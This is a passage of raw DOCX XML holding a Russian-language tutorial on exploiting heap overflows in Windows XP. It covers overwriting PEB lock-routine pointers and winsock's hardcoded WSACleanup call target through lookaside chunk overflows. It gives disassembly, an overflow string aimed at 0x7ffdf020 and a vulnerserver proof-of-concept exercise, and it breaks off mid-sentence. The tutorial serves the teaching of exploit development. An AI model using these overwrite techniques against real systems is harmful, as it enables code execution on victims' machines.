        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C910432</w:t>
        <w:tab/>
        <w:t>FF55 E4</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>CALL DWORD PTR SS:[EBP-1C]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C910435</w:t>
        <w:tab/>
        <w:t>834D FC FF</w:t>
        <w:tab/>
        <w:t>OR DWORD PTR SS:[EBP-4],FFFFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C910439</w:t>
        <w:tab/>
        <w:t>E8 C8E4FFFF</w:t>
        <w:tab/>
        <w:t>CALL ntdll.7C90E906</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C91043E</w:t>
        <w:tab/>
        <w:t>C3</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>RETN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ниже представлено как RtlReleasePebLock() делает прямой вызов функции FastpebUnlockRoutine(), находящейся по смещению 0x24 в массиве глобальных функций внутри PEB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7C910451&gt;</w:t>
        <w:tab/>
        <w:t>64:A1 18000000</w:t>
        <w:tab/>
        <w:t>MOV EAX,DWORD PTR FS:[18]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7C910457</w:t>
        <w:tab/>
        <w:t>8B40 30</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>MOV EAX,DWORD PTR DS:[EAX+30]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7C91045A</w:t>
        <w:tab/>
        <w:t>FF70 1C</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>PUSH DWORD PTR DS:[EAX+1C]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7C91045D</w:t>
        <w:tab/>
        <w:t>FF50 24</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>CALL DWORD PTR DS:[EAX+24]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS:-liga" w:hAnsi="Nimbus Mono PS:-liga"/>
        </w:rPr>
        <w:t>7C910460</w:t>
        <w:tab/>
        <w:t>C3</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>RETN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Поэтому, когда при исключении вызываются  RtlAcquirePebLock() и RtlReleasePebLock(), ваш код будет вызываться раз за разом до бесконечности. Но при вызове своего шеллкода вы можете пропатчи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>ть</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> PEB, замени</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> указатель </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">на </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>адрес функции exit().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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448300" cy="4562475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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448300" cy="4562475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Чем больше текущий процесс содержит потоков (</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>threads, тредов</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">), тем меньше используется рандомизации (для нескольких PEB'ов </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">используются </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>рандомизированные адреса), что даёт возможность "угадать" адреса в текуще</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> PEB. Но это не решает нашу проблем</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>у</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, потому что у нас нет надежного способа записи четвёрки, что позволило бы перезаписать указатель на функцию. Иногда само приложени использует нестандартный указатель либо до исключения, либо как указатель на другую библиотеку Windows. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Его м</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ы можем переписать так, чтобы он указывал на наш шеллкод.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Особ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">ые варианты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>эксплуатации указателей:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Для демонстрации я проведу переполнения чанка в lookaside в Windows XP SP1 (потому что в ней глобальные указатели PEB фиксированы). FastPEBLockRoutine() находится по адресу 0x7ffdf020.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Раскомментируйте эту строку:</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t>// strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBB\x20\xf0\xfd\x7f");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>И закомментируйте эту:</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t>gets(a);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Теперь мы переполним чанк A строкой из X'ов и перепишем часть чанка B строками AAAA и BBBB. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>В заключение</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> перепишем указатель на flink значением 0x7ffdf020. Скомпилируйте программу и откройте в отладчике. Аллоцировав чанк C (находящийся по адресу  0x7ffdf020), мы можем записать в него шеллкод, который будет вызван при исключении. Ниже можно увидеть, как в EAX записывается адрес PEB и происходит прямой вызов FastPEBLockRoutine(), что передаёт управление нашему коду.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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332220" cy="4572000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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6332220" cy="4572000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Имея полный контроль над EIP, его можно использовать для возвращени</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>я</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> обратно в код. С этого момента можно с лёгкостью обойти DEP и добиться исполнени</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>я</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> кода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Эксплуатация указателей, определяемая приложением:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Эта статья будет неполной, если я не представлю пример эксплуатации этой уязвимости в Windows XP SP3. При работе с приложениями, содержащими переполнение буфера любой захардкоже</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>н</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ный вызов функции, который можно перезаписать и выполнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>с помощью</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> переполнения должен быть использован. К примеру WSACleanup() из библиотеки winsock. Он содержит захардкоженный вызов 0x71ab400a в XP SP3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">По этому адресу можно разместить </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">наш шеллкод. Таким образом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">он будет срабатывать </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">при </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">каждом </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>вызове WSACleanup() (или других функций winsock). Ниже дизассемлированный код WSACleanup() и поиск захардкоженных вызовов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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332220" cy="2539365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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6332220" cy="2539365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Почти любое приложение в Windows скорее всего ис</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>п</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>оль</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>зу</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ет функции winsock. В частности WSACleanup() используется для очистки любых соединений, что практически гарантирует вызов после переполнения. По этой причине перезапись по адресу 0x71ac4050 работает так </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>надёжно</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Другим примером будет функция recv, которая тоже вызывает эту функцию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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086225" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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4086225" cy="1285875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Если после</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>д</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>овать за вызовом 0x71ab678f, мы попадём сюда:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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209030" cy="1041400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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6209030" cy="1041400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Кто бы мог подумать? Еще один вызов 0x71ac4050. Чтобы удостовериться, что это сработает, взглянем на права доступа.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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079365" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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5079365" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Фундаментальным недостатком этого метода является то, что при перезаписи кода по этому адресу, любой шеллкод, использующий winsock (я бы сказал, практически все) перестанет работать. Од</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ин</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> из вариантов решения - патчить 0x71ac4050 оригинальным кодом, чтобы вызовы winsock продолжили работать.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t>Пример эксплуатации указателей, определяемых приложением:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Я предоставил бинарник vulnerserver (большая часть кода взята из блога Стивена Бредшоуса (Stephen Bradshaws) из Infosec Institute, вс</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>е заслуги</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> принадлеж</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>т ему) и подправил его так, чтобы он содержал переполнения кучи и утечки памяти.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Идея состоит в том, чтобы написать PoC эксплойт, который при запуске будет выстаивать структуру кучи так, что вы можете переписать чанк в lookaside и получить контроль над выполнением. Скачайте этот файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(b33f: файл недоступен)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> и запустите его в Windows SP3. Попробуйте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>методы</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, о которых я рассказывал выше, это поможет вам лучше понять, как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>они работают</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. Я решил, что пока не буду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>выкладывать</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> исходник, чтобы люди занялись реверс-инжинирингом и сами поняли, как добиться правильной структуры внутри кучи и выз</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
